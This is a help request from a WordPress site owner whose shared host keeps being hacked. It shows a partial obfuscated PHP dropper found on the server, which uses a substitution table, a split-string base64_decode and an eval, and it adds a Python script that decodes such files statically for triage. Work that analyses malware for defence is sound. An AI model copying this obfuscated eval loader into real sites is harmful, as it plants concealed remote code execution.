I manage a WordPress website on a shared hosting space which also holds other PHP applications.
This website keeps getting hacked - code is injected into files and strange files are uploaded.
The website has been blacklisted once by Google for serving malware and spamming.
I have gotten hold of some of the strange files uploaded to the website. I need help determining what they
do, maybe that will give a clue to how the attack is carried out.
Here is a preview from one of the files:
<?php
$evgiriesgt = 4906; function wahpvdpnen($undacn, $fqocaar){$qnhdcm = ''; for($i=0; $i < strlen($undacn); $i++){$qnhdcm .= isset($fqocaar[$undacn[$i]]) ? $fqocaar[$undacn[$i]] : $undacn[$i];}
$swztdx="base" . "64_decode";return $swztdx($qnhdcm);}
$wwuoxneyhf = 'k852rBYaMKkzIcBQVNYQKcUhMQVpljXBbje17eFqk852rBYaMKkzIcUhMfY5VLIhVLoL'.
/*Missing lines*/
'xN5NlxWgVNBaqPusvkzWlxEWMD4zZQEgVNBa7eFq3kFqvk15T85Fqxgs';
$yoazv = Array('1'=>'p', '0'=>'j', '3'=>'f', '2'=>'u', '5'=>'l', '4'=>'N', '7'=>'O', '6'=>'Y', '9'=>'U', '8'=>'G', 'A'=>'6', 'C'=>'t', 'B'=>'V', 'E'=>'A', 'D'=>'W', 'G'=>'4', 'F'=>'0', 'I'=>'J', 'H'=>'3', 'K'=>'X', 'J'=>'q', 'M'=>'Z', 'L'=>'n', 'O'=>'H', 'N'=>'m', 'Q'=>'y', 'P'=>'S', 'S'=>'F', 'R'=>'h', 'U'=>'x', 'T'=>'e', 'W'=>'g', 'V'=>'c', 'Y'=>'9', 'X'=>'5', 'Z'=>'b', 'a'=>'z', 'c'=>'2', 'b'=>'T', 'e'=>'w', 'd'=>'d', 'g'=>'k', 'f'=>'1', 'i'=>'L', 'h'=>'v', 'k'=>'Q', 'j'=>'E', 'm'=>'P', 'l'=>'I', 'o'=>'M', 'n'=>'r', 'q'=>'K', 'p'=>'s', 's'=>'7', 'r'=>'a', 'u'=>'B', 't'=>'8', 'w'=>'i', 'v'=>'D', 'y'=>'R', 'x'=>'C', 'z'=>'o');
eval/*auswexcu*/(wahpvdpnen($wwuoxneyhf, $yoazv));?>
http://pastebin.com/6frRpVhq
Thanks.
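A static decoder for the scheme used in the posted file (per-character substitution, then `base64_decode`, then `eval`), as an added example that is not part of the original post: it reads the PHP as text and never executes it. The function names are this example's own, and the sample embeds only the table and the first payload literal from the post.

```python
import base64
import re

# Excerpt shaped like the posted file. The substitution table and the first payload
# literal are copied from the post (literal split in two here to exercise "."
# concatenation); the rest of the payload is omitted, as it is in the post.
SAMPLE = r"""<?php
$wwuoxneyhf = 'k852rBYaMKkzIcBQVNYQKcUhMQVpljXBbje17eFq'.
/*Missing lines*/
'k852rBYaMKkzIcUhMfY5VLIhVLoL';
$yoazv = Array('1'=>'p', '0'=>'j', '3'=>'f', '2'=>'u', '5'=>'l', '4'=>'N', '7'=>'O', '6'=>'Y', '9'=>'U', '8'=>'G', 'A'=>'6', 'C'=>'t', 'B'=>'V', 'E'=>'A', 'D'=>'W', 'G'=>'4', 'F'=>'0', 'I'=>'J', 'H'=>'3', 'K'=>'X', 'J'=>'q', 'M'=>'Z', 'L'=>'n', 'O'=>'H', 'N'=>'m', 'Q'=>'y', 'P'=>'S', 'S'=>'F', 'R'=>'h', 'U'=>'x', 'T'=>'e', 'W'=>'g', 'V'=>'c', 'Y'=>'9', 'X'=>'5', 'Z'=>'b', 'a'=>'z', 'c'=>'2', 'b'=>'T', 'e'=>'w', 'd'=>'d', 'g'=>'k', 'f'=>'1', 'i'=>'L', 'h'=>'v', 'k'=>'Q', 'j'=>'E', 'm'=>'P', 'l'=>'I', 'o'=>'M', 'n'=>'r', 'q'=>'K', 'p'=>'s', 's'=>'7', 'r'=>'a', 'u'=>'B', 't'=>'8', 'w'=>'i', 'v'=>'D', 'y'=>'R', 'x'=>'C', 'z'=>'o');
eval/*auswexcu*/(wahpvdpnen($wwuoxneyhf, $yoazv));?>"""

# PHP calls worth a closer look when they show up in a decoded layer.
RISKY = re.compile(r"\b(eval|assert|system|exec|shell_exec|passthru|base64_decode|"
                   r"ini_set|file_put_contents|move_uploaded_file)\s*\(")


def extract_map(src):
    """Substitution table: every 'x'=>'y' pair of single characters."""
    return dict(re.findall(r"'(.)'\s*=>\s*'(.)'", src))


def extract_payload(src):
    """Longest assignment made of single-quoted literals joined by '.'."""
    src = re.sub(r"/\*.*?\*/", "", src, flags=re.S)  # drop /* ... */ filler
    runs = re.findall(r"=\s*((?:'[^']*'\s*\.?\s*)+);", src)
    return "".join(re.findall(r"'([^']*)'", max(runs, key=len)))


def decode(src):
    """Replay the PHP loop (map each char, keep unmapped ones), then base64-decode."""
    table = extract_map(src)
    mapped = "".join(table.get(ch, ch) for ch in extract_payload(src))
    mapped = mapped[: len(mapped) - len(mapped) % 4]  # tolerate a truncated sample
    return base64.b64decode(mapped)


def triage(decoded):
    """Names of PHP calls worth reviewing that appear in the decoded layer."""
    return sorted(set(RISKY.findall(decoded.decode("latin-1"))))


if __name__ == "__main__":
    layer = decode(SAMPLE)
    print(layer.decode("latin-1"))
    print("calls to review:", triage(layer))
```

Run against the complete file, the same functions print the full first layer; if that layer contains another `eval(base64_decode(...))`, decode it the same way rather than running it.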